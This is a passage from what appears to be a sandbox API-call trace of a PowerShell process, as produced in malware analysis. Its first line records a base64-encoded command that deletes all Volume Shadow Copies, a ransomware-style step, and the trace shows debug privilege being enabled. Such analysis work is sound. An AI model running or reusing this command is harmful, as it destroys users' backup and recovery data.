(bstr="RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==") returned 0x150 [0117.004] WindowsCreateStringReference () returned 0x0 [0117.004] RoGetActivationFactory () returned 0x0 [0117.011] QueryInterface () returned 0x0 [0117.011] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0117.011] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0117.011] QueryInterface () returned 0x0 [0117.011] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0117.012] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0117.012] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0117.012] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0117.012] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0117.012] Release () returned 0x4 [0117.012] CoGetContextToken (in: pToken=0xdbd4d0 | out: pToken=0xdbd4d0) returned 0x0 [0117.012] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0117.013] CoGetContextToken (in: pToken=0xdbd7e0 | out: pToken=0xdbd7e0) returned 0x0 [0117.013] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0117.013] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0117.013] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0117.013] WindowsDeleteString () returned 0x0 [0117.013] Release () returned 0x2 [0117.013] CoGetContextToken (in: pToken=0xdbdf58 | out: pToken=0xdbdf58) returned 0x0 [0117.015] CoGetContextToken (in: pToken=0xdbdeb8 | out: pToken=0xdbdeb8) returned 0x0 [0117.015] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0117.015] AddRef () returned 0x4 [0117.015] Release () returned 0x3 [0117.289] IIDFromString (in: lpsz="{410B7711-FF3B-477F-9C9A-D2EFDA302DC3}", lpiid=0xdbd5f0 | out: lpiid=0xdbd5f0) returned 0x0 [0117.290] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0125.655] GenericStreamBase::Write () returned 0x0 [0125.655] GenericStreamBase::Write () returned 0x0 [0125.656] CoCreateGuid (in: pguid=0x740e47a8 | out: pguid=0x740e47a8*(Data1=0xc4df6f23, Data2=0xeea0, Data3=0x4fda, Data4=([0]=0x9b, [1]=0x66, [2]=0x50, [3]=0x81, [4]=0xb4, [5]=0x78, [6]=0x6c, [7]=0x99))) returned 0x0 [0125.656] GenericStreamBase::Write () returned 0x0 [0125.659] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0125.659] CExtensionCatalog::AddRef () returned 0x3 [0125.659] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0125.660] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0125.660] Release () returned 0x3 [0125.660] CoGetContextToken (in: pToken=0xdbd3a8 | out: pToken=0xdbd3a8) returned 0x0 [0125.660] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0125.918] WindowsCreateString () returned 0x0 [0125.918] CExtensionCatalog::AddRef () returned 0x4 [0125.918] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0125.925] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0125.951] EtwEventRegister (in: ProviderId=0x50d5c78, EnableCallback=0x7252bc6, CallbackContext=0x0, RegHandle=0x50d5c54 | out: RegHandle=0x50d5c54) returned 0x0 [0125.991] EtwEventRegister (in: ProviderId=0x50d637c, EnableCallback=0x7252bee, CallbackContext=0x0, RegHandle=0x50d6358 | out: RegHandle=0x50d6358) returned 0x0 [0125.991] EtwEventSetInformation (RegHandle=0x12c9e20, InformationClass=0x2d, EventInformation=0x2, InformationLength=0x50d631c) returned 0x0 [0126.166] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdbe8e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdbe8e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0126.177] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0xdbe8e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdbe8e4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x95, [1]=0x4b, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0126.177] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdbe894*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdbe894*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0126.188] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0xdbe8f4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x95, [1]=0x4b, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0xdbe8f4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x95, [1]=0x4b, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0126.233] EtwEventRegister (in: ProviderId=0x50d678c, EnableCallback=0x7252c16, CallbackContext=0x0, RegHandle=0x50d6764 | out: RegHandle=0x50d6764) returned 0x0 [0126.241] EtwEventWriteTransfer (RegHandle=0x12c9d48, EventDescriptor=0x2e, ActivityId=0xdbe908, RelatedActivityId=0xdbe8b4, UserDataCount=0x0, UserData=0x0) returned 0x0 [0126.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe070 | out: phkResult=0xdbe070*=0x0) returned 0x2 [0126.258] RegCloseKey (hKey=0x80000002) returned 0x0 [0126.413] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0126.419] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0126.419] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0126.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe7b8) returned 1 [0126.420] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xdbe834 | out: lpFileInformation=0xdbe834*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0126.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe7b4) returned 1 [0126.422] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xdbe8a8 | out: lpdwHandle=0xdbe8a8) returned 0x94c [0127.317] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x50d9f68 | out: lpData=0x50d9f68) returned 1 [0127.319] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdbe87c, puLen=0xdbe878 | out: lplpBuffer=0xdbe87c*=0x50da004, puLen=0xdbe878) returned 1 [0127.321] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da0e0, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da134, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da190, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da1d0, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da238, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da2d4, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da338, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da3b4, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x50da05c, puLen=0xdbe7f8) returned 1 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x0, puLen=0xdbe7f8) returned 0 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x0, puLen=0xdbe7f8) returned 0 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xdbe7fc, puLen=0xdbe7f8 | out: lplpBuffer=0xdbe7fc*=0x0, puLen=0xdbe7f8) returned 0 [0127.322] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdbe7f0, puLen=0xdbe7ec | out: lplpBuffer=0xdbe7f0*=0x50da004, puLen=0xdbe7ec) returned 1 [0127.323] VerLanguageNameW (in: wLang=0x0, szLang=0xdbe580, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0127.324] VerQueryValueW (in: pBlock=0x50d9f68, lpSubBlock="\\", lplpBuffer=0xdbe800, puLen=0xdbe7fc | out: lplpBuffer=0xdbe800*=0x50d9f90, puLen=0xdbe7fc) returned 1 [0127.327] GetCurrentProcessId () returned 0x514 [0127.332] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdbe0c4 | out: lpLuid=0xdbe0c4*(LowPart=0x14, HighPart=0)) returned 1 [0127.333] GetCurrentProcess () returned 0xffffffff [0127.333] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdbe0c0 | out: TokenHandle=0xdbe0c0*=0x360) returned 1 [0127.334] AdjustTokenPrivileges (in: TokenHandle=0x360, DisableAllPrivileges=0, NewState=0x50dc428*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.334] CloseHandle (hObject=0x360) returned 1 [0127.336] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x514) returned 0x360 [0127.477] EnumProcessModules (in: hProcess=0x360, lphModule=0x50dc46c, cb=0x100, lpcbNeeded=0xdbe830 | out: lphModule=0x50dc46c, lpcbNeeded=0xdbe830) returned 1 [0127.478] GetModuleInformation (in: hProcess=0x360, hModule=0x13b0000, lpmodinfo=0x50decb8, cb=0xc | out: lpmodinfo=0x50decb8*(lpBaseOfDll=0x13b0000, SizeOfImage=0x6c000, EntryPoint=0x13b95f0)) returned 1 [0127.479] CoTaskMemAlloc (cb=0x804) returned 0x133c6e8 [0127.479] GetModuleBaseNameW (in: hProcess=0x360, hModule=0x13b0000, lpBaseName=0x133c6e8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0127.480] CoTaskMemFree (pv=0x133c6e8) [0127.481] CoTaskMemAlloc (cb=0x804) returned 0x133c6e8 [0127.481] GetModuleFileNameExW (in: hProcess=0x360, hModule=0x13b0000, lpFilename=0x133c6e8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0127.481] CoTaskMemFree (pv=0x133c6e8) [0127.481] CloseHandle (hObject=0x360) returned 1 [0127.482] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x514) returned 0x360 [0127.483] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x50dbb90 | out: lpExitCode=0x50dbb90*=0x103) returned 1 [0127.493] EnumWindows (lpEnumFunc=0x7252c3e, lParam=0x0) returned 1 [0127.495] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xae8 [0127.495] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.496] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x100c4, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x100ac, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x100a4, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x10098, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.496] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.497] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.497] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.497] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.497] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc9c [0127.497] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.497] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.497] GetWindowThreadProcessId (in: hWnd=0x801f8, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x97c [0127.497] GetWindowThreadProcessId (in: hWnd=0x602b4, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x764 [0127.498] GetWindowThreadProcessId (in: hWnd=0x1b001c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x7e4 [0127.498] GetWindow (hWnd=0x1b001c, uCmd=0x4) returned 0x0 [0127.498] IsWindowVisible (hWnd=0x1b001c) returned 0 [0127.498] GetWindowThreadProcessId (in: hWnd=0x202ae, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xb9c [0127.499] GetWindowThreadProcessId (in: hWnd=0x6013e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x13dc [0127.499] GetWindowThreadProcessId (in: hWnd=0x302c8, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x13dc [0127.499] GetWindowThreadProcessId (in: hWnd=0x302bc, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xee0 [0127.499] GetWindowThreadProcessId (in: hWnd=0x702be, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x11d8 [0127.499] GetWindowThreadProcessId (in: hWnd=0x202aa, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5a4 [0127.499] GetWindowThreadProcessId (in: hWnd=0x202a4, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd34 [0127.499] GetWindowThreadProcessId (in: hWnd=0x102a2, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x564 [0127.500] GetWindowThreadProcessId (in: hWnd=0x2029c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdcc [0127.500] GetWindowThreadProcessId (in: hWnd=0x1029a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xe14 [0127.500] GetWindowThreadProcessId (in: hWnd=0x10296, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa70 [0127.500] GetWindowThreadProcessId (in: hWnd=0x10292, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcfc [0127.500] GetWindowThreadProcessId (in: hWnd=0x1028e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcd4 [0127.500] GetWindowThreadProcessId (in: hWnd=0x1028a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xff8 [0127.500] GetWindowThreadProcessId (in: hWnd=0x20284, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf74 [0127.501] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf6c [0127.501] GetWindowThreadProcessId (in: hWnd=0x1027e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xfbc [0127.504] GetWindowThreadProcessId (in: hWnd=0x3027a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf80 [0127.504] GetWindowThreadProcessId (in: hWnd=0x10276, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdb0 [0127.504] GetWindowThreadProcessId (in: hWnd=0x20272, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf64 [0127.504] GetWindowThreadProcessId (in: hWnd=0x1026e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf60 [0127.504] GetWindowThreadProcessId (in: hWnd=0x1026a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xeb8 [0127.504] GetWindowThreadProcessId (in: hWnd=0x10266, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xeb4 [0127.505] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xea8 [0127.505] GetWindowThreadProcessId (in: hWnd=0x2025c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xea4 [0127.505] GetWindowThreadProcessId (in: hWnd=0x20258, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x6e0 [0127.505] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf0 [0127.505] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x648 [0127.505] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa80 [0127.505] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5b8 [0127.506] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x440 [0127.506] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xe54 [0127.506] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x2bc [0127.506] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x1ec [0127.506] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xac8 [0127.506] GetWindowThreadProcessId (in: hWnd=0x20230, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcb8 [0127.507] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x738 [0127.507] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdf4 [0127.507] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdfc [0127.507] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa88 [0127.507] GetWindowThreadProcessId (in: hWnd=0x3021c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x6d8 [0127.507] GetWindowThreadProcessId (in: hWnd=0x2021a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5c4 [0127.507] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdc0 [0127.508] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdc4 [0127.508] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc48 [0127.508] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xb70 [0127.508] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x58 [0127.508] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xda0 [0127.508] GetWindowThreadProcessId (in: hWnd=0x40074, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc18 [0127.508] GetWindowThreadProcessId (in: hWnd=0x4007c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd90 [0127.509] GetWindowThreadProcessId (in: hWnd=0x20078, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd6c [0127.509] GetWindowThreadProcessId (in: hWnd=0x40072, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd68 [0127.509] GetWindowThreadProcessId (in: hWnd=0x30054, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd54 [0127.509] GetWindowThreadProcessId (in: hWnd=0x20068, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd50 [0127.509] GetWindowThreadProcessId (in: hWnd=0x2005a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xab4 [0127.509] GetWindowThreadProcessId (in: hWnd=0x30058, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xac0 [0127.510] GetWindowThreadProcessId (in: hWnd=0x30056, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd24 [0127.510] GetWindowThreadProcessId (in: hWnd=0x40060, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd10 [0127.510] GetWindowThreadProcessId (in: hWnd=0x30176, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa24 [0127.510] GetWindowThreadProcessId (in: hWnd=0x501e0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x7f0 [0127.510] GetWindowThreadProcessId (in: hWnd=0x5014e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x550 [0127.510] GetWindowThreadProcessId (in: hWnd=0x3002a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x384 [0127.510] GetWindowThreadProcessId (in: hWnd=0x30106, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x4e4 [0127.511] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x4fc [0127.511] GetWindowThreadProcessId (in: hWnd=0x20150, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa10 [0127.511] 